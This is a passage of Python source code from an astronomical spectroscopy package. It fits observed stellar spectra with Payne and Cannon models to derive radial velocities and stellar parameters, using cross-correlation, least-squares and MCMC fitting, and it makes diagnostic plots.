initpar1 = np.zeros(nfitparams+nspec,float)
initpar1[0:nfitparams] = wtpars[0:nfitparams]
# the default is to use mean vhelio + BC for all visit spectra
initpar1[nfitparams:] = wtpars[nfitparams]-info['bc'] # vhelio = vrel + BC
# Use the Vrel values from the initial fitting if they are accurate enough
gdinit,ngdinit = dln.where(np.isfinite(info['vrel']) & (info['snr']>5))
if ngdinit>0:
initpar1[nfitparams+gdinit] = info['vrel'][gdinit]
    # Step 3) Refit all spectra simultaneously, fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #3: Fitting all spectra simultaneously')
out1, fmodels1 = multifit_lsq_payne(specmlist,modlist,fitparams=fitparams,
fixparams=fixparams,initpar=initpar1)
stelpars1 = out1['pars'][0,0:nfitparams]
stelparerr1 = out1['parerr'][0,0:nfitparams]
vrel1 = out1['pars'][0,nfitparams:]
vrelerr1 = out1['parerr'][0,nfitparams:]
vhelio1 = vrel1+info['bc']
medvhelio1 = np.median(vhelio1)
vscatter1 = dln.mad(vhelio1)
verr1 = vscatter1/np.sqrt(nspec)
if verbose is True:
print('Parameters:')
printpars(stelpars1,names=fitparams)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio1,verr1))
print('Vscatter = %6.3f km/s' % vscatter1)
print('Vhelio values = ',vhelio1)
    # Step 4) Tweak continua and remove outliers
if verbose is True:
print(' ')
print('Step #4: Tweaking continuum and masking outliers')
if notweak is False:
for i,spm in enumerate(specmlist):
# Create parameter list that includes RV at the end
params1 = list(stelpars1)+[vrel1[i]]
paramnames1 = fitparams+['RV']
parinput1 = dict(zip(paramnames1,params1))
model1 = modlist[i]
labels1 = model1.mklabels(parinput1)
bestm = model1(labels1)
# Tweak the continuum normalization
spm = tweakcontinuum(spm,bestm,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
spm = utils.maskdiscrepant(spm,bestm,verbose=verbose)
specmlist[i] = spm.copy()
else:
if verbose: print('Skipping tweaking')
    # Step 5) Refit all spectra simultaneously, fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #5: Re-fitting all spectra simultaneously')
# Initial guesses for all the parameters, nfitparams stellar parameters and Nspec relative RVs
initpar2 = out1['pars'][0]
out2, fmodels2 = multifit_lsq_payne(specmlist,modlist,fitparams=fitparams,
fixparams=fixparams,initpar=initpar2)
stelpars2 = out2['pars'][0,0:nfitparams]
stelparerr2 = out2['parerr'][0,0:nfitparams]
vrel2 = out2['pars'][0,nfitparams:]
vrelerr2 = out2['parerr'][0,nfitparams:]
vhelio2 = vrel2+info['bc']
medvhelio2 = np.median(vhelio2)
vscatter2 = dln.mad(vhelio2)
verr2 = vscatter2/np.sqrt(nspec)
if verbose is True:
print('Final parameters:')
printpars(stelpars2,names=fitparams)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio2,verr2))
print('Vscatter = %6.3f km/s' % vscatter2)
print('Vhelio values = ',vhelio2)
# Final output structure, one element per spectrum
final = info.copy()
for k in range(nfitparams):
name = fitparams[k].lower()
        final[name] = stelpars2[k]
        final[name+'err'] = stelparerr2[k]
final['vrel'] = vrel2
final['vrelerr'] = vrelerr2
final['vhelio'] = vhelio2
bmodel = []
totchisq = 0.0
totnpix = 0
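    # Accumulate chi-squared over all spectra: final['chisq'] holds the per-spectrum
    # value, while totchisq is the global value over all pixels of all spectra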
for i in range(nspec):
# Create parameter list that includes RV at the end
params1 = list(stelpars2)+[vrel2[i]]
paramnames1 = fitparams+['RV']
parinput1 = dict(zip(paramnames1,params1))
model1 = modlist[i]
labels1 = model1.mklabels(parinput1)
m = model1(labels1)
sp1 = specmlist[i]
chisq = np.sqrt(np.sum(((sp1.flux-m.flux)/sp1.err)**2)/(sp1.npix*sp1.norder))
totchisq += np.sum(((sp1.flux-m.flux)/sp1.err)**2)
totnpix += sp1.npix*sp1.norder
final['chisq'][i] = chisq
bmodel.append(m)
totchisq = np.sqrt(totchisq/totnpix)
# Average values
sumdtlist = [('medsnr',float),('totsnr',float),('vhelio',float),('vscatter',float),('verr',float)]
for k in range(nfitparams):
name = fitparams[k].lower()
sumdtlist += [(name,np.float32),(name+'err',np.float32)]
sumdtlist += [('chisq',float)]
sumdt = np.dtype(sumdtlist)
sumstr = np.zeros(1,dtype=sumdt)
sumstr['medsnr'] = np.median(info['snr'])
sumstr['totsnr'] = np.sqrt(np.sum(info['snr']**2))
sumstr['vhelio'] = medvhelio2
sumstr['vscatter'] = vscatter2
sumstr['verr'] = verr2
for k in range(nfitparams):
name = fitparams[k].lower()
sumstr[name] = stelpars2[k]
sumstr[name+'err'] = stelparerr2[k]
sumstr['chisq'] = totchisq
# Save the best-fitting plots
if saveplot is True:
if verbose is True:
print('')
print('Making best-fit plots for each spectrum')
pdfnames = []
specfiles = [s.filename for s in speclist]
for i,f in enumerate(specfiles):
# Figure the output figure filename
fdir,base,ext = utils.splitfilename(speclist[i].filename)
figname = base+'_dopjointfit.png'
if outdir is not None: figname = outdir+'/'+figname
if (outdir is None) & (fdir != ''): figname = fdir+'/'+figname
# Make the plot
spec = speclist[i]
specm = specmlist[i]
fmodel = bmodel[i]
fout = final[i]
# Apply continuum tweak to original spectrum as well
orig = spec.copy()
if orig.normalized is False: orig.normalize()
cratio = specm.cont/orig.cont
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
annotlabels = np.char.array(fitparams+['RV']).lower()
annotlabels[-1] = 'vrel'
specfigure(figname,specm,fmodel,fout,original=orig,verbose=True,
ispayne=True,annotlabels=annotlabels)
# Make a PDF version that we will combine at the end
fignamepdf = figname.replace('.png','.pdf')
specfigure(fignamepdf,specm,fmodel,fout,original=orig,verbose=False,
ispayne=True,annotlabels=annotlabels)
pdfnames.append(fignamepdf)
# Combine the PDFs into one
fdir,base,ext = utils.splitfilename(specfiles[0])
combname = base+'_dopjointfit_comb.pdf' # png
if outdir is not None: combname = outdir+'/'+combname
if (outdir is None) & (fdir != ''): combname = fdir+'/'+combname
if os.path.exists(combname): os.remove(combname)
cmd = ['gs','-dBATCH','-dNOPAUSE','-q','-sDEVICE=pdfwrite','-sOutputFile='+combname]
cmd = cmd+pdfnames
try:
            out = subprocess.check_call(cmd,stderr=subprocess.STDOUT,shell=False)
if verbose: print('Combined plots saved to '+combname)
except subprocess.CalledProcessError:
raise Exception("Could not combine PDFs with ghostscript")
# Delete individual PDFs
for fp in pdfnames: os.remove(fp)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
return sumstr, final, bmodel, specmlist
######################### CANNON PROGRAMS ###########################
def emcee_lnlike_cannon(theta, x, y, yerr, models, spec):
"""
This helper function calculates the log likelihood for the MCMC portion of fit().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
models : list of Cannon models
List of Cannon models to use
spec : Spec1D
The observed spectrum. Needed to run cannon.model_spectrum().
Outputs
-------
lnlike : float
The log likelihood value.
"""
#m = cannon.model_spectrum(models,spec,teff=theta[0],logg=theta[1],feh=theta[2],rv=theta[3])
m = models(teff=theta[0],logg=theta[1],feh=theta[2],rv=theta[3])
inv_sigma2 = 1.0/yerr**2
return -0.5*(np.sum((y-m.flux.flatten())**2*inv_sigma2))
def emcee_lnprior_cannon(theta, models):
"""
This helper function calculates the log prior for the MCMC portion of fit().
It's a flat/uniform prior across the stellar parameter space covered by the
Cannon models.
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
models : list of Cannon models
List of Cannon models to use
Outputs
-------
lnprior : float
The log prior value.
"""
for m in models:
inside = True
for i in range(3):
inside &= (theta[i]>=m.ranges[i,0]) & (theta[i]<=m.ranges[i,1])
inside &= (np.abs(theta[3]) <= 1000)
if inside:
return 0.0
return -np.inf
def emcee_lnprob_cannon(theta, x, y, yerr, models, spec):
"""
This helper function calculates the log probability for the MCMC portion of fit().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
models : list of Cannon models
List of Cannon models to use
spec : Spec1D
The observed spectrum. Needed to run cannon.model_spectrum().
Outputs
-------
lnprob : float
The log probability value, which is the sum of the log prior and the
log likelihood.
"""
lp = emcee_lnprior_cannon(theta,models)
if not np.isfinite(lp):
return -np.inf
return lp + emcee_lnlike_cannon(theta, x, y, yerr, models, spec)
def fit_xcorrgrid_cannon(spec,models=None,samples=None,verbose=False,maxvel=1000.0):
"""
Fit spectrum using cross-correlation with models sampled in the parameter space.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
samples : numpy structured array, optional
Catalog of teff/logg/feh parameters to use when sampling the parameter space.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
maxvel : float, optional
The maximum velocity to probe in the cross-correlation. The default is 1000 km/s.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_xcorrgrid_cannon(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Check that the samples input has the right columns
if samples is not None:
for n in ['teff','logg','feh']:
try:
dum = samples[n]
except:
raise ValueError(n+' not found in input SAMPLES')
# Step 1: Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
spec = utils.specprep(spec)
# Step 2: Load and prepare the Cannon models
#-------------------------------------------
if models is None:
models = cannon.models.copy()
models.prepare(spec)
# Step 3: put on logarithmic wavelength grid
#-------------------------------------------
wavelog = utils.make_logwave_scale(spec.wave,vel=0.0) # get new wavelength solution
obs = spec.interp(wavelog)
# The LSF information will not be correct if using Gauss-Hermite, it uses a Gaussian approximation
# it's okay because the "models" are prepared for the original spectra (above)
# Step 4: get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
dwlog = np.median(dln.slope(np.log10(wavelog)))
# vrel = ( 10**(xshift*dwlog)-1 )*cspeed
maxlag = np.int(np.ceil(np.log10(1+maxvel/cspeed)/dwlog))
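    # require at least 50 pixels of lag so the cross-correlation peak is well sampled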
maxlag = np.maximum(maxlag,50)
if samples is None:
#teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 9000.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0]
#logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 8.0, 0.5, 1.0, 2.0, 3.0]
# temporarily remove WD until that's fixed
teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0]
logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 0.5, 1.0, 2.0, 3.0]
feh = -0.5
dt = np.dtype([('teff',float),('logg',float),('feh',float)])
samples = np.zeros(len(teff),dtype=dt)
samples['teff'][:] = teff
samples['logg'][:] = logg
samples['feh'][:] = feh
outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32),
('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32)])
    outstr = np.zeros(len(samples),dtype=outdtype)
if verbose is True: print('TEFF LOGG FEH VREL CCPEAK CHISQ')
for i in range(len(samples)):
m = models([samples['teff'][i],samples['logg'][i],samples['feh'][i]],rv=0,wave=wavelog)
outstr1 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag)
if verbose is True:
            print('%7.2f %5.2f %5.2f %5.2f %5.2f %5.2f' % (samples['teff'][i],samples['logg'][i],samples['feh'][i],outstr1['vrel'][0],outstr1['ccpeak'][0],outstr1['chisq'][0]))
for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: outstr[n][i] = outstr1[n]
        outstr['teff'][i] = samples['teff'][i]
        outstr['logg'][i] = samples['logg'][i]
        outstr['feh'][i] = samples['feh'][i]
# Get best fit
bestind = np.argmin(outstr['chisq'])
beststr = outstr[bestind]
bestmodel = models(teff=beststr['teff'],logg=beststr['logg'],feh=beststr['feh'],rv=beststr['vrel'])
if verbose is True:
print('Initial RV fit:')
printpars([beststr['teff'],beststr['logg'],beststr['feh'],beststr['vrel']],[None,None,None,beststr['vrelerr']])
return beststr, bestmodel
def fit_lsq_cannon(spec,models=None,initpar=None,verbose=False):
"""
Least Squares fitting with forward modeling of the spectrum.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV], optional.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_lsq_cannon(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Load and prepare the Cannon models
#-------------------------------------------
if models is None:
models = cannon.models.copy()
models.prepare(spec)
# Get initial estimates
if initpar is None:
initpar = np.array([6000.0, 2.5, -0.5, 0.0])
initpar = np.array(initpar).flatten()
# Calculate the bounds
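    # Start from extreme sentinel values; the min/max over the individual model
    # ranges below shrinks these to the union of the Cannon model coverage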
lbounds = np.zeros(4,float)+1e5
ubounds = np.zeros(4,float)-1e5
for p in models:
lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1))
ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1))
lbounds[3] = -1000
ubounds[3] = 1000
bounds = (lbounds, ubounds)
# Make sure RV is in the boundaries
initpar[3] = dln.limit(initpar[3],-999,999)
# function to use with curve_fit
def spec_interp(x,teff,logg,feh,rv):
""" This returns the interpolated model for a given spectrum."""
# The "models" and "spec" must already exist outside of this function
m = models(teff=teff,logg=logg,feh=feh,rv=rv)
if m is None:
return np.zeros(spec.flux.shape,float).flatten()+1e30
return m.flux.flatten()
# Use curve_fit
lspars, lscov = curve_fit(spec_interp, spec.wave.flatten(), spec.flux.flatten(), sigma=spec.err.flatten(),
p0=initpar, bounds=bounds)
# If it hits a boundary then the solution won't change much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares RV and stellar parameters:')
printpars(lspars)
lsmodel = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=lspars[3])
lschisq = np.sqrt(np.sum(((spec.flux-lsmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('pars',float,4),('parerr',float,4),('parcov',float,(4,4)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def fit_mcmc_cannon(spec,models=None,initpar=None,steps=100,cornername=None,verbose=False):
"""
Fit the spectrum with MCMC.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV], optional.
steps : int, optional
Number of steps to use. Default is 100.
cornername : string, optional
Output filename for the corner plot. If a corner plot is requested, then the
minimum number of steps used is 500.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
        out, bmodel = fit_mcmc_cannon(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Load and prepare the Cannon models
#-------------------------------------------
if models is None:
models = cannon.models.copy()
models.prepare(spec)
# Initial estimates
if initpar is None:
initpar = [6000.0, 2.5, -0.5, 0.0]
# Set up the MCMC sampler
ndim, nwalkers = 4, 20
delta = [initpar[0]*0.1, 0.1, 0.1, 0.2]
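    # Initialize the walkers in a small Gaussian ball around the initial estimate,
    # with per-parameter scatter given by delta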
pos = [initpar + delta*np.random.randn(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, emcee_lnprob_cannon,
args=(spec.wave.flatten(), spec.flux.flatten(), spec.err.flatten(), models, spec))
if cornername is not None: steps=np.maximum(steps,500) # at least 500 steps
out = sampler.run_mcmc(pos, steps)
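    # Discard the first half of the chain as burn-in before measuring percentiles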
samples = sampler.chain[:, np.int(steps/2):, :].reshape((-1, ndim))
# Get the median and stddev values
pars = np.zeros(ndim,float)
parerr = np.zeros(ndim,float)
if verbose is True: print('MCMC values:')
names = ['Teff','logg','[Fe/H]','Vrel']
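    # The reported value is the posterior median; the uncertainty is half of the
    # 16th-84th percentile range (a 1-sigma equivalent)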
for i in range(ndim):
t=np.percentile(samples[:,i],[16,50,84])
pars[i] = t[1]
parerr[i] = (t[2]-t[0])*0.5
if verbose is True: printpars(pars,parerr)
# The maximum likelihood parameters
bestind = np.unravel_index(np.argmax(sampler.lnprobability),sampler.lnprobability.shape)
pars_ml = sampler.chain[bestind[0],bestind[1],:]
mcmodel = models(teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3])
mcchisq = np.sqrt(np.sum(((spec.flux-mcmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
# Put it into the output structure
dtype = np.dtype([('pars',float,4),('pars_ml',float,4),('parerr',float,4),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = pars
out['pars_ml'] = pars_ml
out['parerr'] = parerr
out['chisq'] = mcchisq
# Corner plot
if cornername is not None:
matplotlib.use('Agg')
        fig = corner.corner(samples, labels=["T$_{eff}$", r"$\log{g}$", "[Fe/H]", "Vrel"], truths=pars)
plt.savefig(cornername)
plt.close(fig)
print('Corner plot saved to '+cornername)
return out,mcmodel
def fit_cannon(spectrum,models=None,verbose=False,mcmc=False,figfile=None,cornername=None,
retpmodels=False,nthreads=None,notweak=False,tpoly=False,tpolyorder=3):
"""
Fit the spectrum. Find the best RV and stellar parameters using the Cannon models.
Parameters
----------
spectrum : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is False by default.
figfile : string, optional
The filename for a diagnostic plot showing the observed spectrum, model
spectrum and the best-fit parameters.
cornername : string, optional
The filename for a "corner" plot showing the posterior distributions from
the MCMC run.
retpmodels : bool, optional
        Return the prepared models.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
model : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
specm : Spec1D object
The observed spectrum with discrepant and outlier pixels masked.
pmodels : DopplerCannonModelSet
The prepared Doppler Cannon models, only if retpmodels=True.
Example
-------
.. code-block:: python
out, model = fit_cannon(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Turn off the Cannon's info messages
tclogger = logging.getLogger('thecannon.utils')
tclogger.disabled = True
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
t0 = time.time()
if verbose: print('Fitting Cannon model to spectrum with parameters: '+', '.join(['Teff','logg','[Fe/H]','RV']))
# Make internal copy
spec = spectrum.copy()
# Step 1: Prepare the spectrum
#-----------------------------
# Normalize and mask the spectrum
spec = utils.specprep(spec)
# Mask out any large positive outliers, e.g. badly subtracted sky lines
specm = utils.maskoutliers(spec,verbose=verbose)
# Step 2: Load and prepare the Cannon models
#-------------------------------------------
if models is None: models = cannon.models.copy()
models.prepare(specm)
## NOT interpolated onto the observed wavelength scale
# Step 3: Get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
beststr, xmodel = fit_xcorrgrid_cannon(specm,models,verbose=verbose,maxvel=1000.0)
# Step 4: Get better Cannon stellar parameters using initial RV
#--------------------------------------------------------------
# put observed spectrum on rest wavelength scale
# get cannon model for "best" teff/logg/feh values
# run cannon.test() on the spectrum and variances
# just shift the observed wavelengths to rest, do NOT interpolate the spectrum
#restwave = obs.wave*(1-beststr['vrel']/cspeed)
restwave = specm.wave*(1-beststr['vrel']/cspeed)
bestmodel = models.get_best_model([beststr['teff'],beststr['logg'],beststr['feh']])
bestmodelinterp = bestmodel.interp(restwave)
labels0, cov0, meta0 = bestmodelinterp.test(specm)
# Make sure the labels are within the ranges
labels0 = labels0.flatten()
for i in range(3): labels0[i]=dln.limit(labels0[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1])
bestmodelspec0 = bestmodelinterp(labels0)
if verbose is True:
print('Initial Cannon stellar parameters using initial RV')
printpars(labels0)
# Tweak the continuum normalization
if notweak is False:
specm = tweakcontinuum(specm,bestmodelspec0,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
specm = utils.maskdiscrepant(specm,bestmodelspec0,verbose=verbose)
# Refit the Cannon
labels, cov, meta = bestmodelinterp.test(specm)
# Make sure the labels are within the ranges
labels = labels.flatten()
for i in range(3): labels[i]=dln.limit(labels[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1])
bestmodelspec = bestmodelinterp(labels)
if verbose is True:
print('Initial Cannon stellar parameters using initial RV and Tweaking the normalization')
printpars(labels)
# Step 5: Improved RV using better Cannon template
#-------------------------------------------------
wavelog = utils.make_logwave_scale(specm.wave,vel=0.0) # get new wavelength solution
obs = specm.interp(wavelog)
m = models.get_best_model(labels).interp(wavelog)(labels,rv=0)
dwlog = np.median(dln.slope(np.log10(wavelog)))
# vrel = ( 10**(xshift*dwlog)-1 )*cspeed
maxlag = np.int(np.ceil(np.log10(1+1000.0/cspeed)/dwlog))
maxlag = np.maximum(maxlag,50)
outstr2 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag)
outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32),
('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32)])
beststr2= np.zeros(1,dtype=outdtype)
for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: beststr2[n] = outstr2[n]
beststr2['teff'] = labels[0]
beststr2['logg'] = labels[1]
beststr2['feh'] = labels[2]
# Step 6: Improved Cannon stellar parameters
#-------------------------------------------
    restwave = specm.wave*(1-beststr2['vrel']/cspeed)  # use the improved RV from Step 5
bestmodel = models.get_best_model([beststr2['teff'],beststr2['logg'],beststr2['feh']])
bestmodelinterp = bestmodel.interp(restwave)
labels2, cov2, meta2 = bestmodelinterp.test(specm)
# Make sure the labels are within the ranges
labels2 = labels2.flatten()
for i in range(3): labels2[i]=dln.limit(labels2[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1])
bestmodelspec2 = bestmodelinterp(labels2)
if verbose is True:
print('Improved RV and Cannon stellar parameters:')
printpars(np.concatenate((labels2,beststr2['vrel'])),[None,None,None,beststr2['vrelerr']])
# Step 7: Least Squares fitting with forward modeling
#----------------------------------------------------
# Get best model so far
m = models(teff=beststr2['teff'],logg=beststr2['logg'],feh=beststr2['feh'],rv=beststr2['vrel'])
# Tweak the continuum
if notweak is False:
specm = tweakcontinuum(specm,m,usepoly=tpoly,polyorder=tpolyorder)
# Get initial estimates
initpar = [beststr2['teff'],beststr2['logg'],beststr2['feh'],beststr2['vrel']]
initpar = np.array(initpar).flatten()
lsout, lsmodel = fit_lsq_cannon(specm,models,initpar=initpar,verbose=verbose)
lspars = lsout['pars'][0]
lsperror = lsout['parerr'][0]
# Step 8: Run fine grid in RV, forward modeling
#----------------------------------------------
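    # Evaluate chisq on a coarse 30-point velocity grid around the least-squares RV,
    # then interpolate onto a 10x finer grid to locate the minimum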
maxv = np.maximum(beststr2['vrel'][0],20.0)
vel = dln.scale_vector(np.arange(30),lspars[3]-maxv,lspars[3]+maxv)
chisq = np.zeros(len(vel))
for i,v in enumerate(vel):
m = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=v)
chisq[i] = np.sqrt(np.sum(((specm.flux-m.flux)/specm.err)**2)/(specm.npix*specm.norder))
vel2 = dln.scale_vector(np.arange(300),lspars[3]-maxv,lspars[3]+maxv)
chisq2 = dln.interp(vel,chisq,vel2)
bestind = np.argmin(chisq2)
finerv = vel2[bestind]
finechisq = chisq2[bestind]
if verbose is True:
print('Fine grid best RV = %5.2f km/s' % finerv)
print('chisq = %5.2f' % finechisq)
# Final parameters and uncertainties (so far)
fpars = lspars
fperror = lsperror
fpars[3] = finerv
fchisq = finechisq
fmodel = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=finerv)
# Step 9: MCMC
#--------------
if (mcmc is True) | (cornername is not None):
mcout, mcmodel = fit_mcmc_cannon(specm,models,fpars,verbose=verbose,cornername=cornername)
# Use these parameters
fpars = mcout['pars'][0]
fperror = mcout['parerr'][0]
fchisq = mcout['chisq'][0]
fmodel = mcmodel
# Construct the output
#---------------------
bc = specm.barycorr()
# Check if we should apply the barycentric correction
    # some spectra already have this applied to the wavelength solution
nobc = False
if hasattr(spec,'nobc'):
nobc = spec.nobc
# Apply barycentric correction
if nobc is False:
vhelio = fpars[3] + bc
else:
vhelio = fpars[3]
if verbose is True:
print('NOT applying Barycentric Correction')
if verbose is True:
print('Final parameters:')
printpars(fpars[0:3],fperror[0:3])
print('Vhelio = %6.2f +/- %5.2f km/s' % (vhelio,fperror[3]))
print('BC = %5.2f km/s' % bc)
print('chisq = %5.2f' % fchisq)
dtype = np.dtype([('vhelio',np.float32),('vrel',np.float32),('vrelerr',np.float32),
('teff',np.float32),('tefferr',np.float32),('logg',np.float32),('loggerr',np.float32),
('feh',np.float32),('feherr',np.float32),('chisq',np.float32),('bc',np.float32)])
out = np.zeros(1,dtype=dtype)
out['vhelio'] = vhelio
out['vrel'] = fpars[3]
out['vrelerr'] = fperror[3]
out['teff'] = fpars[0]
out['tefferr'] = fperror[0]
out['logg'] = fpars[1]
out['loggerr'] = fperror[1]
out['feh'] = fpars[2]
out['feherr'] = fperror[2]
out['chisq'] = fchisq
out['bc'] = bc
# Make diagnostic figure
if figfile is not None:
# Apply continuum tweak to original spectrum as well
cratio = specm.cont/spec.cont
orig = spec.copy()
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
# Make the diagnostic figure
specfigure(figfile,specm,fmodel,out,original=orig,verbose=verbose)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
    # Return the prepared models
if retpmodels is True:
return out, fmodel, specm, models
return out, fmodel, specm
def multifit_lsq_cannon(speclist,modlist,initpar=None,verbose=False):
"""
Least Squares fitting with forward modeling of multiple spectra simultaneously.
Parameters
----------
    speclist : list of Spec1D objects
        List of the observed spectra to fit.
modlist : list of Doppler Cannon models
        A list of the prepared Doppler Cannon models to use, one set for each observed
spectrum.
initpar : numpy array, optional
        Initial estimates for [teff, logg, feh] plus one relative RV per spectrum, optional.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
    bmodel : numpy array
        The best-fitting model flux array, concatenated over all input spectra.
Example
-------
.. code-block:: python
        out, bmodel = multifit_lsq_cannon(speclist,modlist,initpar)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
## Prepare the spectrum
##-----------------------------
## normalize and mask spectrum
#if spec.normalized is False: spec.normalize()
#if spec.mask is not None:
# # Set errors to high value, leave flux alone
# spec.err[spec.mask] = 1e30
## Load and prepare the Cannon models
##-------------------------------------------
#if models is None: models = cannon.models.prepare(spec)
# Get initial estimates
npar = 3+nspec
if initpar is None:
initpar = np.zeros(npar,float)
initpar[0:3] = np.array([6000.0, 2.5, -0.5])
# Calculate the bounds
lbounds = np.zeros(npar,float)+1e5
ubounds = np.zeros(npar,float)-1e5
for p in modlist[0]:
lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1))
ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1))
lbounds[3:] = -1000
ubounds[3:] = 1000
bounds = (lbounds, ubounds)
# function to use with curve_fit
def multispec_interp(x,*argv):
""" This returns the interpolated model for a given spectrum."""
# The "models" and "spec" must already exist outside of this function
#print(argv)
teff = argv[0]
logg = argv[1]
feh = argv[2]
vrel = argv[3:]
npix = len(x)
nspec = len(vrel)
flux = np.zeros(npix,float)
cnt = 0
for i in range(nspec):
npx = speclist[i].npix*speclist[i].norder
